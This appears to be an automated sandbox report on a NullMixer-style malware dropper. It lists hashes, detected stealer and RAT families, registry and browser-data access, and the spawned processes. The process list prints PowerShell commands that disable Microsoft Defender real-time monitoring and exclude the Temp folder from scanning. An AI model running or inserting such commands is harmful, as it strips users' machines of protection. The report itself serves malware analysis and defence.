| SHA512 | 52114327d022eeb3832742ad81b1881a8efe3e66632900298e59569cb44532aa06a63a3c65d5b1ab339b8e5e285b360584bbbe0c1db68442f478a24a81132996 |
C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM
| MD5 | b3eb9fd17e8ad098cabb8c902e9e229b |
| SHA1 | 496db608d89ede6d7e52cc12c87fd51985d77dd3 |
| SHA256 | 48ff5cfc37c60e061bc6479c3fcf221527693c3e24c18e5e23e6287d4e38f3e7 |
| SHA512 | 5fdbe3bac951c3c5c0e3ab21fe308b6072f5b3cb3ee9ddb414226df52268baf860b562564b024c3d817af3b5da87511762a7220493033b74dd650bc8ccf809f9 |
C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/4172-256-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4404-239-0x0000000073900000-0x00000000740B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 874c28a44bb613b71919f06365a823a0 |
| SHA1 | d85614eeb4e6c9517eedb93b405c4077133576e0 |
| SHA256 | 77b8b49ee116b159117ac51fb2c405881beca0dc0df825e2b3020c98569f2fb9 |
| SHA512 | 777df7ab41538bb2b13c56054ce7f9d593c3e5ff8f1e0bc616c438381c590d66fdf917d843154681554df8bc9a93699cea316ecca9755be9f3a264374aaea5e7 |
memory/4788-232-0x0000000007260000-0x000000000727A000-memory.dmp
memory/968-257-0x0000000003540000-0x00000000035E7000-memory.dmp
memory/4788-231-0x0000000007170000-0x0000000007184000-memory.dmp
memory/4788-207-0x0000000006F30000-0x0000000006F4A000-memory.dmp
memory/4788-178-0x0000000006B90000-0x0000000006BC2000-memory.dmp
memory/1124-174-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/3036-164-0x0000000000400000-0x000000000051C000-memory.dmp
memory/968-261-0x0000000003600000-0x0000000003694000-memory.dmp
memory/968-259-0x0000000003600000-0x0000000003694000-memory.dmp
memory/968-258-0x0000000003600000-0x0000000003694000-memory.dmp
memory/4404-66-0x0000000004B50000-0x0000000004B86000-memory.dmp
memory/3036-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3036-60-0x0000000064941000-0x000000006494F000-memory.dmp
memory/3036-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3036-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3036-55-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3036-53-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3036-54-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3036-52-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3036-51-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3036-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1760-263-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/8-262-0x0000000000400000-0x0000000000414000-memory.dmp
memory/968-264-0x0000000000400000-0x000000000055D000-memory.dmp
memory/968-273-0x0000000003600000-0x0000000003694000-memory.dmp
memory/968-274-0x00000000036A0000-0x000000000565B000-memory.dmp
memory/968-275-0x0000000005660000-0x00000000056ED000-memory.dmp
memory/968-276-0x0000000005700000-0x0000000005789000-memory.dmp
memory/968-279-0x0000000005700000-0x0000000005789000-memory.dmp
memory/968-280-0x0000000000F20000-0x0000000000F21000-memory.dmp
memory/968-281-0x0000000000F30000-0x0000000000F34000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3180 set thread context of 2996 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe |
| PID 1032 set thread context of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe |
| PID 1900 set thread context of 2104 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-7U75N.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19ac3c92c21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\dwm.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331518534095" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\dwm.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\dwm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
